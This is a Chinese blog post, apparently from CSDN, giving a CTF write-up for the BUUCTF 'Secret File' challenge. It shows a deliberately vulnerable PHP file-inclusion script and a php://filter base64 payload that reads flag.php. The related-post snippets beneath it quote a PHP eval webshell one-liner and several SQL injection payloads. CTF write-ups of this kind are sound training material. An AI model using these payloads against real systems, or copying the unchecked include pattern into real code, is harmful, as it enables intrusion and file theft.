BUUCTF[极客大挑战 2019]Secret File

最新推荐文章于 2022-04-15 19:05:15 发布
最新推荐文章于 2022-04-15 19:05:15 发布
阅读量95 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46481239/article/details/111994952
版权

在这里插入图片描述查看页面源代码,有提示
在这里插入图片描述点进去访问看看
在这里插入图片描述又出现一个跳转界面
在这里插入图片描述再点进去一看,已经查阅结束了
应该是错过了一些东西的,我们抓个包看看有没有遗漏信息

在这里插入图片描述发现 secr3t.php ,访问看看
在这里插入图片描述发现源代码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

发现文件包含,给了提示,flag放在了flag.php里
在这里插入图片描述尝试读取flag.php
但是看不见
看了一下源代码并没有过滤filter函数,尝试使用php://filter伪协议 文件包含读取flag.php

?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述base64解码
在这里插入图片描述

F10NAF11pp3d
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF】[极客挑战 2019] Secret File Writeup
algae
08-22 706
<html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stris...
【reverse】2021 极客挑战(部分)
woodwhale的博客
11-29 3690
【reverse】2021 极客挑战(部分) 1、调试 0x1 什么?得安装linux虚拟机?像我这种直接用ubuntu系统的根本不虚! 0x2 尝试直接运行,未果 拖入ida中分析,先看main 上来就比较字符串,然后返回,v4是栈里的变量,初始化为0,必然不等于后面的字符串 看看汇编,发现了端倪 如果不相等就去loc_14A0这个函数,发现这个函数直接退出了,没啥用 我们看看如果想等跳转的函数loc_14551。怎么说都比上面退出的函数正常吧。 0x3 到这里我们想直接调用到loc_14
2018极客挑战-not reverse
博客
11-30 480
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 学好数学很重要 学好数学很重要 学好数学很重要 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
Buuctf:[极客挑战 2019]LoveSQL1
羽的博客
07-09 257
随便输入 1 1 果然。 1' 1
BUUCTF-web-[极客挑战 2019]Secret File
weixin_44866139的博客
05-16 3802
查看源码之后发现achieve_room.php 点击secret,发现end.php 提示回去再仔细看看,查看achieve.php的源代码 发现action.php,访问,然而依旧回到了end.php 说明这个跳转的时间特别快,我们需要抓包,有一个抓包神器BrupSuite,使用它发现action有一个隐藏的回应 <html> <title>secret</title> <meta charset="UTF-8"> <?php
secret_file
12-24
攻防世界pwn题,该题虽然最终解题脚本比较简单,但分析过程还是比较中肯的,适合新人一同学习。解题wp链接:https://blog.csdn.net/A951860555/article/details/111601870
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
BUUCTF[极客挑战 2019]EasySQL
GUOGUO的博客
04-15 338
BUUCTF[极客挑战 2019]EasySQL 进去之后,可以看到如下页面: 直接万能管理员账号以及万能密码: 账号:admin 密码:1’ or 1=1# 可以直接登录。登陆成功后显示: 020454966)] 得到flag
CTF Geek Challenge——第十一届极客挑战Re Write Up
无限迭代中......
11-18 667
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
[BUUCTF0223][极客挑战 2020]Roamphp1-Welcome
m0_52674595的博客
12-24 453
[BUUCTF0223] [极客挑战 2020]Roamphp1-Welcome 打开靶机 什么都没 查看源码 什么也没有 猜想不是用GET请求 尝试用POST请求 使用火狐的插件:RESTClient 使用POST请求 查看预览 看到要求 $_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'] 即roam1与roam2不能相等 再看sha1()函数 查看得知sha1()
[极客挑战 2019]Secret File
夜幕下的灯火阑珊的博客
05-14 238
查看源码得到Archive_room.php 转到Archive_room.php 点击SECRET后跳转到end.php,没有找到有用的信息。burpsuite抓包,重放可得 访问secr3t.php得到源码 <html> <title>secret</title> <meta charset="UT...
BUUCTF WEB 极客挑战 2019 Knife
Ethan552525的博客
08-02 345
题目: 解题: 1:一句话木马 形式:<?php eval($_POST['shell']);?> 原理:存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 2:尝试用HackBar传数据 HackBar:chrome插件,是web渗透的SQL注入工具。 插件下载:https://github.com/Mr-xn/hackbar2.1.3...
极客挑战2019LoveSQL】
qq_45927819的博客
09-12 230
题目地址:http://b7f87fb9-2d9b-47f3-8c81-31d54bda9fe7.node3.buuoj.cn 看到需要账户和密码直接采用万能钥匙来试一下。 admin’ or 1=1# 密码随便填就可以 登陆成功了 判断列数: > /check.php ?username=1' order by 3%23&password=1 没有报错,只是账户密码错误 当到order by 4 时报错了 所以判断出有三个列数。 联合查询爆数据库 /check.php ?userna
日常练习之web(极客挑战 2019 BuyFlag)
doraemon12345的博客
11-30 158
打开题目没看懂,让干嘛的,在右上角发现pyflag字样 点进去看看,也没啥有用的信息,f12看一下源码发现提示 需要post传入password和money,要让password=404 ,发现函数is_numeric,去学习一下 说白了就是一个判断变量的函数,空格,%00,%20,这类的都可以绕过,后来我自己试验了一下发现这道题404后面跟一个字符(a,b,!,*等等可以自己试一下)也可以绕过,先传参抓包。 出现一个user=0,给他改成user=1。 如果你money不够多就会出现loser 太惨了
第11届极客挑战writeup
weixin_45883223的博客
11-25 2602
第11届极客挑战writeupWeb朋友的学妹EZwww刘壮的黑页WelcomeEZgit我是大黑客ezbypassReNo RE no gain我真不会写驱动!WhatsApkHelloAndroidre00mazeMisc一“页”障目壮言壮语秘技·反复横跳来拼图Pwn数学咋样?runcodeliuzhuang-secretbaby_canaryCrypto二战情报员刘壮铠甲与萨满成都养猪二厂规规矩矩的工作babyRSA韡髻猊岈 Web 朋友的学妹 F12,注释,base64解码 EZwww url最后
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 226
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值